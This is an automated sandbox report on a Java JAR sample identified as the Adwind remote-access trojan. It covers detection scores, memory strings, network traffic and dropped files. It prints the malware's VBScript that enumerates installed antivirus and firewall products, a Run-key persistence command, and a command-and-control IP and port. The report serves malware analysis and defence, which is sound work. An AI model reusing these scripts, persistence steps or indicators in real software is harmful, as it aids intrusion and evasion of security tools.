Analysis Report

Overview

General Information

Joe Sandbox Version:	20.0.0
Analysis ID:	353368
Start time:	09:40:14
Joe Sandbox Product:	Cloud
Start date:	31.08.2017
Overall analysis duration:	0h 15m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	75Doc 0.26777400 15041397050000000jpg.jar
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled VBA Instrumentation enabled JavaScript Instrumentation enabled
Detection:	MAL
Classification:	mal92.evad.expl.troj.winJAR@152/348@0/3
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
EGA Information:	Failed
Cookbook Comments:	Sleeps bigger than 20000ms are automatically reduced to 500ms Found application associated with file extension: .jar
Warnings:	Show All Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Report size getting too big, too many NtReadFile calls found. Report size getting too big, too many NtSetInformationFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: java.exe, java.exe, javaw.exe, java.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	92	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Signature Overview

Click to jump to signature section

DDoS:

Too many similar processes found

Show sources

Source: unknown

Process created: 92

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe

Process created: C:\Windows\System32\cmd.exe

Networking:

Urls found in memory or binary data

Show sources

Source: java.exe	String found in binary or memory: file://
Source: javaw.exe	String found in binary or memory: file:///
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/charsets.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/access-bridge.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/cldrdata.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/dnsns.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/jaccess.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/jfxrt.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/localedata.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/nashorn.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/sunec.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/sunjce_provider.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/sunmscapi.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/sunpkcs11.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/ext/zipfs.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/jce.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/jfr.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/jsse.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/resources.jar
Source: java.exe	String found in binary or memory: file:///c:/program%20files/java/jre1.8.0_40/lib/rt.jar
Source: java.exe	String found in binary or memory: file:///c:/users/user/appdata/local/temp/_0.4312212827200392546983382786626386.class
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/charsets.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/access-bridge.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/cldrdata.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/dnsns.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/jaccess.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/jfxrt.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/localedata.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/nashorn.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/sunec.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/sunjce_provider.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/sunmscapi.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/sunpkcs11.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/ext/zipfs.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/jce.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/jfr.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/jsse.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/resources.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/appdata/roaming/oracle/lib/rt.jar
Source: java.exe	String found in binary or memory: file:///c:/users/user/desktop/75doc%200.26777400%2015041
Source: java.exe	String found in binary or memory: file:///c:/users/user/desktop/75doc%200.26777400%2015041397050000000jpg.jar
Source: javaw.exe	String found in binary or memory: file:///c:/users/user/eddlsovkfgw/aknzqikoykh.qmsbqy
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/3
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error8
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error=
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace/
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations9
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsh
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/honour-all-schemalocations
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/honour-all-schemalocationsxs
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/include-comments
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/include-comments0
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only/
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd:
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs7
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs3
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant2
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformantan2
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformants:2
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees-r1
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees1
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/dynamicr
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking=
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingq
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvicq
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaulta
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value-q
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueb
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef:
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/features/xinclude1
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/-s
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node9
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/input-buffer-sizecondit
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory:
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner7
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor5
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner8
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver7
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler6
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context0
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-tableq
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager:q
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validation-managerf
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory7
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factorys
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd:
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler9
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/locale
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/localej
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/schema/external-nonamespaceschemalocation
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/schema/external-nonamespaceschemalocation?
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemalocation
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemalocation(
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/security-managerh
Source: java.exe, javaw.exe	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymoustypes
Source: java.exe	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymoustypes/w3c/d
Source: java.exe	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymoustypes;ljava
Source: javaw.exe	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymoustypesg/w3c/
Source: javaw.exe	String found in binary or memory: http://bugreport.java.com/bugreport/crash.jsp
Source: javaw.exe	String found in binary or memory: http://bugreport.java.com/bugreport/crash.jspresourcemanagement
Source: javaw.exe, java.exe	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, java.exe	String found in binary or memory: http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.ven
Source: xcopy.exe	String found in binary or memory: http://downloa
Source: java.exe	String found in binary or memory: http://java.oracle.com/
Source: javaw.exe	String found in binary or memory: http://java.sun.com/dtd/properties.dtd
Source: java.exe, javaw.exe	String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: java.exe, javaw.exe	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: javaw.exe	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check1s
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/dom/properties/b(
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/dom/properties/d(
Source: javaw.exe	String found in binary or memory: http://java.sun.com/xml/dom/properties/e(
Source: javaw.exe	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemalanguage
Source: java.exe, javaw.exe	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemalanguage4
Source: javaw.exe	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemasource
Source: java.exe, javaw.exe	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemasource7
Source: javaw.exe	String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0
Source: java.exe, javaw.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtde
Source: javaw.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtdtex
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/om/noda
Source: java.exe, javaw.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state)lorg/w
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-stater
Source: javaw.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-staterg/w3c/
Source: java.exe, javaw.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/ue
Source: javaw.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/y;
Source: javaw.exe	String found in binary or memory: http://javax.xml.xmlconstants/feature/secure-processing
Source: java.exe, javaw.exe	String found in binary or memory: http://javax.xml.xmlconstants/property/
Source: java.exe	String found in binary or memory: http://javax.xml.xmlconstants/property//3
Source: java.exe, javaw.exe	String found in binary or memory: http://javax.xml.xmlconstants/property/accessexternaldtd
Source: java.exe, javaw.exe	String found in binary or memory: http://javax.xml.xmlconstants/property/accessexternaldtd;
Source: javaw.exe	String found in binary or memory: http://javax.xml.xmlconstants/property/accessexternalschema
Source: javaw.exe	String found in binary or memory: http://javax.xml.xmlconstants/property/d3
Source: java.exe	String found in binary or memory: http://javax.xml.xmlconstants/property/r3
Source: java.exe, javaw.exe	String found in binary or memory: http://null.sun.com/
Source: java.exe, javaw.exe	String found in binary or memory: http://null.sun.com/0
Source: javaw.exe	String found in binary or memory: http://openjdk.java.net/jeps/220).
Source: java.exe, javaw.exe	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: java.exe	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism/obje
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanismm/nod
Source: java.exe	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanismon_al
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/hotspot/jvm/java/monitor/address
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/compiler/id
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/gc/id
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/d:
Source: java.exe, javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementattributelimit
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementattributelimit0
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementattributelimitv9
Source: java.exe, javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityexpansionlimit
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityexpansionlimitac
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityexpansionlimitl
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/erces19
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/g/w3c/9
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getentitycountinfo
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/lang/s9
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxelementdepth
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxelementdeptha/lang/c
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxgeneralentitysizelimit
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxgeneralentitysizelimit(z)v
Source: java.exe, javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxoccurlimit
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxoccurlimitde
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxoccurlimite
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxoccurlimitne
Source: java.exe, javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxparameterentitysizelimit
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxparameterentitysizelimit;)z
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxparameterentitysizelimittan
Source: java.exe, javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxxmlnamelimit
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxxmlnamelimitang/str
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxxmlnamelimitass;
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxxmlnamelimitljava/l
Source: java.exe, javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalentitysizelimit
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalentitysizelimitg_
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalentitysizelimitja
Source: javaw.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlsecuritypropertymanager
Source: java.exe, javaw.exe	String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe	String found in binary or memory: http://xml.org/sax/features//lan
Source: javaw.exe	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-enddtd
Source: java.exe	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-enddtd4q
Source: javaw.exe	String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe	String found in binary or memory: http://xml.org/sax/features/external-general-entities7
Source: javaw.exe	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: java.exe	String found in binary or memory: http://xml.org/sax/features/namespaces&
Source: java.exe	String found in binary or memory: http://xml.org/sax/features/om/s
Source: java.exe	String found in binary or memory: http://xml.org/sax/features/tene
Source: javaw.exe	String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe	String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe	String found in binary or memory: http://xml.org/sax/properties/
Source: java.exe, javaw.exe	String found in binary or memory: http://xml.org/sax/properties/(
Source: javaw.exe	String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: java.exe, javaw.exe	String found in binary or memory: https://jrat.io
Source: java.exe	String found in binary or memory: https://jrat.ios
Source: java.exe	String found in binary or memory: https://jrat.ios1

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49201 -> 178.175.138.167:9010

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2020728 ET TROJAN Possible Adwind SSL Cert (assylias.Inc) 178.175.138.167:9010 -> 192.168.1.16:49201

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run GboKDMbfKti
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run GboKDMbfKti

Creates autostart registry keys to launch java

Show sources

Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Direct3D\MostRecentApplication Name javaw.exe
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run GboKDMbfKti "C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe" -jar "C:\Users\user\eDdlsoVKfgW\AknzQIkoyKh.qmSBQy"

Remote Access Functionality:

ADWIND Rat detected

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext
Source: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext
Source: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext

Persistence and Installation Behavior:

